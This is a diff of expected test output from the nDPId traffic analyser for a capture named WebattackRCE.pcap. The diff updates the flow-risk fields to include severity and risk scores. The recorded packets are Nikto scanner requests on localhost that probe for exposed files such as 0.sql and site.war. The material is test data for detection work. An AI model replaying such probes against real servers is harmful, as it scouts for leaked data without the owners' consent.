 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277336,"pkt":"AAAAAAAAAAAAAAAACABFAADFO7NAAEAGAH5\/AAABfwAAAcTQH5BUXAMIX4xO7oAYAED+uQAAAQEICp1m\/YCdZv2AR0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277337,"pkt":"AAAAAAAAAAAAAAAACABFAAC9OaFAAEAGAph\/AAABfwAAAcTSH5DijwEqjka6TYAYAED+sQAAAQEICp1m\/YGdZv2BR0VUIC8wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":421,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277337,"flow_last_seen":1576420277337,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277337,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50386,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"ts_msec":1576420277339,"pkt":"AAAAAAAAAAAAAAAACABFAAC9fmNAAEAGvdV\/AAABfwAAAcTUH5Bm6EbY23UeBoAYAED+sQAAAQEICp1m\/YOdZv2DR0VUIC8wLnNxbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277339,"flow_last_seen":1576420277339,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"ts_msec":1576420277339,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50388,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277340,"pkt":"AAAAAAAAAAAAAAAACABFAADF759AAEAGTJF\/AAABfwAAAcTWH5AedNcrGvcoYYAYAED+uQAAAQEICp1m\/YSdZv2ER0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277340,"flow_last_seen":1576420277340,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277340,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50390,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420277342,"pkt":"AAAAAAAAAAAAAAAACABFAADFUDJAAEAG6\/5\/AAABfwAAAcTYH5DWhmiIUA3tU4AYAED+uQAAAQEICp1m\/YadZv2GR0VUIC8xMjdfMF8wXzEuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":424,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277342,"flow_last_seen":1576420277342,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420277342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50392,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277343,"pkt":"AAAAAAAAAAAAAAAACABFAADA2wlAAEAGYSx\/AAABfwAAAcTaH5BjP+Ox5vZroYAYAED+tAAAAQEICp1m\/YedZv2HR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277343,"flow_last_seen":1576420277343,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277343,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50394,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_packet_id":1,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1576420277344,"pkt":"AAAAAAAAAAAAAAAACABFAADAn6BAAEAGnJV\/AAABfwAAAcTcH5DwnKcnILktrYAYAED+tAAAAQEICp1m\/YidZv2IR0VUIC9zaXRlLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":426,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277344,"flow_last_seen":1576420277344,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"ts_msec":1576420277344,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50396,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"ts_msec":1576420277345,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HTtAAEAGHvx\/AAABfwAAAcTeH5D3FiWCONN3YoAYAED+swAAAQEICp1m\/YmdZv2JR0VUIC8xMjcud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
-00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277345,"flow_last_seen":1576420277345,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277345,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50398,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":428,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277347,"flow_last_seen":1576420277347,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"ts_msec":1576420277347,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50400,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
